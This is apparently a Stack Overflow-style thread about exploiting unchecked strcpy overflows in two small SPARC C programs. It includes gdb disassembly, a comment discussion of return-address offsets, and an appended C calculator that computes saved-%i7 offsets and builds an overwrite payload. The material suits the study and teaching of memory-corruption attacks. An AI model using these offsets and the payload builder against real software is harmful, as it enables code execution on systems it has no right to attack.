Stack overflow on SUN Sparc

But attack.c has a different effect on server2. Do you know why?
/* server1.c */
/* compile: cc -o server1 server1.c */
#include <string.h>

void copy(const char *a){
    char foo[400];
    int i, j, k;
    strcpy(foo, a);   /* no length check: an argv[1] longer than 400 bytes runs past foo */
    i = 1;
}

void main(int argc, char *argv[]){
    if(argc >= 2) copy(argv[1]);
}
Here is the assembly for server2.c:
/* server2.c */
/* compile: cc -o server2 server2.c */
#include <string.h>

void copy2(const char *a){
    char buf[200];
    int i, j, k;
    strcpy(buf, a);   /* same unchecked copy, one call level deeper than in server1 */
    i = 1;
}

void copy1(const char *a){
    char foo[200];    /* never written; only its frame space matters here */
    int i, j, k;
    copy2(a);
    i = 1;
}

void main(int argc, char *argv[]){
    if(argc >= 2) copy1(argv[1]);
}
(gdb) disas copy2
Dump of assembler code for function copy2:
0x00010bd8 <copy2+0>: save %sp, -304, %sp
0x00010bdc <copy2+4>: add %fp, -200, %o0
0x00010be0 <copy2+8>: call 0x20ce8 <strcpy@plt>
0x00010be4 <copy2+12>: mov %i0, %o1
0x00010be8 <copy2+16>: mov 1, %l0
0x00010bec <copy2+20>: st %l0, [ %fp + -204 ]
0x00010bf0 <copy2+24>: ret
0x00010bf4 <copy2+28>: restore
0x00010bf8 <copy2+32>: ret
0x00010bfc <copy2+36>: restore
0x00010c00 <copy2+40>: illtrap 0x10000
0x00010c04 <copy2+44>: illtrap 0x10000
0x00010c08 <copy2+48>: illtrap 0x10000
0x00010c0c <copy2+52>: illtrap 0x10000
End of assembler dump.
(gdb) disas copy1
Dump of assembler code for function copy1:
0x00010c10 <copy1+0>: save %sp, -304, %sp
0x00010c14 <copy1+4>: call 0x10bd8 <copy2>
0x00010c18 <copy1+8>: mov %i0, %o0
0x00010c1c <copy1+12>: mov 1, %l0
0x00010c20 <copy1+16>: st %l0, [ %fp + -204 ]
0x00010c24 <copy1+20>: ret
0x00010c28 <copy1+24>: restore
0x00010c2c <copy1+28>: ret
0x00010c30 <copy1+32>: restore
0x00010c34 <copy1+36>: illtrap 0x10000
0x00010c38 <copy1+40>: illtrap 0x10000
0x00010c3c <copy1+44>: illtrap 0x10000
0x00010c40 <copy1+48>: illtrap 0x10000
0x00010c44 <copy1+52>: illtrap 0x10000
End of assembler dump.
(gdb) disas main
Dump of assembler code for function main:
0x00010c48 <main+0>: save %sp, -96, %sp
0x00010c4c <main+4>: cmp %i0, 2
0x00010c50 <main+8>: bl 0x10c68 <main+32>
0x00010c54 <main+12>: nop
0x00010c58 <main+16>: call 0x10c10 <copy1>
0x00010c5c <main+20>: ld [ %i1 + 4 ], %o0
0x00010c60 <main+24>: ret
0x00010c64 <main+28>: restore
0x00010c68 <main+32>: ret
0x00010c6c <main+36>: restore
End of assembler dump.
For server1.c:
(gdb) disas copy
Dump of assembler code for function copy:
0x00010bc0 <copy+0>: save %sp, -504, %sp
0x00010bc4 <copy+4>: add %fp, -400, %o0
0x00010bc8 <copy+8>: call 0x20c98 <strcpy@plt>
0x00010bcc <copy+12>: mov %i0, %o1
0x00010bd0 <copy+16>: mov 1, %l0
0x00010bd4 <copy+20>: st %l0, [ %fp + -404 ]
0x00010bd8 <copy+24>: ret
0x00010bdc <copy+28>: restore
0x00010be0 <copy+32>: ret
0x00010be4 <copy+36>: restore
0x00010be8 <copy+40>: illtrap 0x10000
0x00010bec <copy+44>: illtrap 0x10000
0x00010bf0 <copy+48>: illtrap 0x10000
0x00010bf4 <copy+52>: illtrap 0x10000
End of assembler dump.
(gdb) disas main
Dump of assembler code for function main:
0x00010bf8 <main+0>: save %sp, -96, %sp
0x00010bfc <main+4>: cmp %i0, 2
0x00010c00 <main+8>: bl 0x10c18 <main+32>
0x00010c04 <main+12>: nop
0x00010c08 <main+16>: call 0x10bc0 <copy>
0x00010c0c <main+20>: ld [ %i1 + 4 ], %o0
0x00010c10 <main+24>: ret
0x00010c14 <main+28>: restore
0x00010c18 <main+32>: ret
0x00010c1c <main+36>: restore
End of assembler dump.

What do I need to change in attack.c so that it exploits server2.c?

Possibly the compiler did not allocate space for foo[] in copy1(), since it is unused. The only way to know for sure is to look at the assembly of the generated executable.

pfff... finally
I thought the offset was 8, but it is 200+8. As I understand it, since copy2() is the callee and copy1() is the caller, copy1's stack frame is below copy2's; we find the total number of bytes allocated to foo and buf, which gives the buffer size. Then we obtain the offset value by adding a value to the size of buf. That value is obtained by computing the address difference between the place where the callee calls the buffer-overflowing instruction and the return address after the caller calls the callee, because that is where we introduce the shellcode.

Buffsize+32+32-8

The compiler did allocate space for foo[]. I think that is because we compiled without optimization (which is exactly what I wanted).

@user: if you have already looked at the assembly, then you know better than anyone here why your attack fails!

Who downvoted this? Given the information available, it is a reasonable guess.

@OliCharlesworth no need to be defensive. Whoever downvoted you, there is no personal animosity; the value of any guess depends on one's point of view. In the end, for the one who downvoted you, two upvoted, so no net loss. :)

In my view, blaming the people who downvoted you is unacceptable.

@桑斯塔: "unacceptable"? Asking for clarification on a downvote seems perfectly reasonable to me...
#define BUFSIZE 464
#define DUFSIZE 256
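The numbers in the thread (BUFSIZE 464 for server1, "200+8" for server2) all fall out of the SPARC V8 frame layout that the `save` immediates and the `add %fp, -N, %o0` operands reveal. Each frame's own %l0-%l7/%i0-%i7 spill area sits at [%sp+0 .. %sp+63] of that frame, with %i7 at %sp+60, and a function's %fp is its caller's %sp. So a local buffer at %fp-400 cannot reach the function's own saved return address (it is at %sp+60, below the buffer); the first %i7 slot in the overwrite path is the caller's, at %fp+60, which is 400+60 = 460 bytes from the start of `foo` in server1 (464 bytes once the 4-byte word is included). In server2 the same walk gives copy1's slot at 200+60 = 260 and main's slot at 200+304+60 = 564, because copy1's entire 304-byte frame (including the unused `foo[200]`) lies between. Two further details matter in practice: `ret` is `jmpl %i7+8, %g0`, so the planted word must be target minus 8, and the stack copy of a window is only consulted when that window has been spilled and is later refilled, so the byte offset alone does not guarantee the corrupted slot is ever used. The following calculator is an added example, not code from the question or from attack.c; the frame sizes and buffer offsets are read off the gdb output above, while the target address 0xffbef000 and the 'A' fill byte are assumed, constructed values.

```c
/* SPARC V8 (32-bit) frame-offset calculator for the server1/server2 overflows.
 * Added example; frame sizes come from the "save %sp, -N, %sp" immediates and
 * buffer offsets from "add %fp, -N, %o0" in the disassembly on this page.
 * The target address and fill byte used in main() are assumed values. */
#include <stdio.h>
#include <string.h>

/* One stack frame, described by the immediate of its "save %sp, -N, %sp". */
typedef struct {
    const char *name;
    long frame_size;
} sparc_frame;

/* V8 ABI: a frame's own %l0-%l7 / %i0-%i7 spill to [%sp+0 .. %sp+63]; %i7 is at %sp+60. */
#define WIN_I7_OFF 60L
/* "ret" is "jmpl %i7+8, %g0": the word we plant must be (target - 8). */
#define RET_ADJUST 8UL

/* Call chains from the disassembly: chain[0] holds the overflowed buffer,
 * chain[1] is its caller, and so on outward. */
const sparc_frame server1_chain[] = { {"copy", 504}, {"main", 96} };
const sparc_frame server2_chain[] = { {"copy2", 304}, {"copy1", 304}, {"main", 96} };

/* Scratch buffer so callers (and tests) can inspect a built payload. */
unsigned char g_payload[600];

/* Byte distance from the first byte of a local buffer at %fp-buf_off in chain[0]
 * to the saved-%i7 slot of chain[depth]. chain[0]'s %fp is chain[1]'s %sp, and each
 * further frame's %sp is the previous one's %sp plus that frame's size. chain[0]'s
 * own saved %i7 (at %sp+60 = %fp-frame_size+60) lies below the buffer and is
 * never reached by the overflow. Returns -1 for an out-of-range depth. */
long sparc_i7_offset(const sparc_frame *chain, int nframes, long buf_off, int depth)
{
    long sp_of_target = 0;  /* %sp of chain[depth], relative to chain[0]'s %fp */
    int k;
    if (depth < 1 || depth >= nframes) return -1;
    for (k = 1; k < depth; k++)
        sp_of_target += chain[k].frame_size;
    return buf_off + sp_of_target + WIN_I7_OFF;
}

/* Build a strcpy-deliverable payload: fill bytes up to the slot, then (target - 8)
 * as a big-endian word, then the terminating NUL. Returns the number of bytes the
 * target's strcpy will write before the NUL (slot + 4), or -1 when the address cannot
 * be delivered this way: misaligned (SPARC faults on an unaligned instruction fetch),
 * containing a NUL byte (strcpy stops there), or not fitting in cap. The fill byte
 * must be non-zero for the same reason; note the canonical SPARC nop (0x01000000)
 * contains NUL bytes and so cannot serve as sled filler through strcpy. */
long build_payload(unsigned char *out, size_t cap, long i7_off, unsigned long target, unsigned char fill)
{
    unsigned long word = (target - RET_ADJUST) & 0xffffffffUL;
    unsigned char be[4];
    int i;
    if (i7_off < 0 || (size_t)i7_off + 4 >= cap) return -1;
    if (fill == 0 || (target & 3) != 0) return -1;
    for (i = 0; i < 4; i++) {
        be[i] = (unsigned char)(word >> (24 - 8 * i));
        if (be[i] == 0) return -1;
    }
    memset(out, fill, (size_t)i7_off);
    memcpy(out + i7_off, be, 4);
    out[i7_off + 4] = '\0';
    return i7_off + 4;
}

int main(void)
{
    long off1  = sparc_i7_offset(server1_chain, 2, 400, 1);  /* main's %i7 seen from copy's foo */
    long off2a = sparc_i7_offset(server2_chain, 3, 200, 1);  /* copy1's %i7 (return into main) seen from buf */
    long off2b = sparc_i7_offset(server2_chain, 3, 200, 2);  /* main's %i7, past copy1's whole frame */
    /* 0xffbef000 is an assumed stack address, chosen only to show the encoding. */
    long n = build_payload(g_payload, sizeof g_payload, off1, 0xffbef000UL, 'A');
    printf("server1: main's %%i7 slot at foo+%ld, strcpy payload %ld bytes\n", off1, n);
    printf("server2: copy1's %%i7 slot at buf+%ld, main's at buf+%ld\n", off2a, off2b);
    return 0;
}
```

Run it and compare the server1 figure with the `#define BUFSIZE 464` above: the slot starts at byte 460 and the 4-byte word ends at 463, so 464 bytes is exactly what reaches main's saved %i7 and nothing beyond it. For server2 the same attack.c payload length overshoots copy1's slot by 200 bytes and stops 100 bytes short of main's, which is why it behaves differently; which of the two slots is worth targeting depends on which window is actually refilled from the stack before its `ret`.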